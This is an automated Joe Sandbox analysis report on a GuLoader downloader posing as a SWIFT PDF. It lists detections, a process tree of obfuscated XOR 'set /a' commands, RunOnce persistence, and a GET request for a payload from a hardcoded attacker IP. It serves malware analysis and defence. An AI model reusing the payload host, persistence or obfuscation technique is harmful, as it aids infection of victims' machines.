Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFTCOPYMT1030000000_pdf.exe

Overview

General Information

Sample name:SWIFTCOPYMT1030000000_pdf.exe
Analysis ID:1432107
MD5:1048340bcfae30df032c161ac52f8f0e
SHA1:8a3370d01a170626ef43202f5fe54e27372abec4
SHA256:47a75ba2cc69f372c816fb61d079ebe6e3a81eeeb16e72726725b088a59f4e94
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Mass process execution to delay analysis
Obfuscated command line found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Sigma detected: CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • SWIFTCOPYMT1030000000_pdf.exe (PID: 1976 cmdline: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe" MD5: 1048340BCFAE30DF032C161AC52F8F0E)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 452 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 528 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2500 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5196 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5592 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3608 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 452 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5272 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6584 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5456 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7444 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4916 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1244 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2036 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2940 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1564 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7048 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 840 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2300 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7808 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5804 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1572 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2500 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6964 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4768 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6284 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5696 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7424 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4972 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2632 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5376 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5100 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2036 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3204 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4404 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7012 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3308 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6056 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2424 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1784 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4972 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2632 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1728 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5100 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5700 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4212 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6416 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7372 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6512 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • SWIFTCOPYMT1030000000_pdf.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe" MD5: 1048340BCFAE30DF032C161AC52F8F0E)
      • WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: SWIFTCOPYMT1030000000_pdf.exe PID: 1976JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: New RUN Key Pointing to Suspicious Folder
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Blankbook
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Blankbook

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exeVirustotal: Detection: 36%Perma Link
          Multi AV Scanner detection for submitted file
          Source: SWIFTCOPYMT1030000000_pdf.exeReversingLabs: Detection: 15%
          Source: SWIFTCOPYMT1030000000_pdf.exeVirustotal: Detection: 36%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: SWIFTCOPYMT1030000000_pdf.exeJoe Sandbox ML: detected
          Source: SWIFTCOPYMT1030000000_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,6_2_00405454
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405E7B FindFirstFileA,FindClose,6_2_00405E7B
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_0040264F FindFirstFileA,6_2_0040264F
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_0040264F FindFirstFileA,136_2_0040264F
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00405454 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,136_2_00405454
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00405E7B FindFirstFileA,FindClose,136_2_00405E7B
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\nsv10BA.tmpJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Uforstaaeligheds.ComJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: global trafficHTTP traffic detected: GET /yFtqL16.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.8.104Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
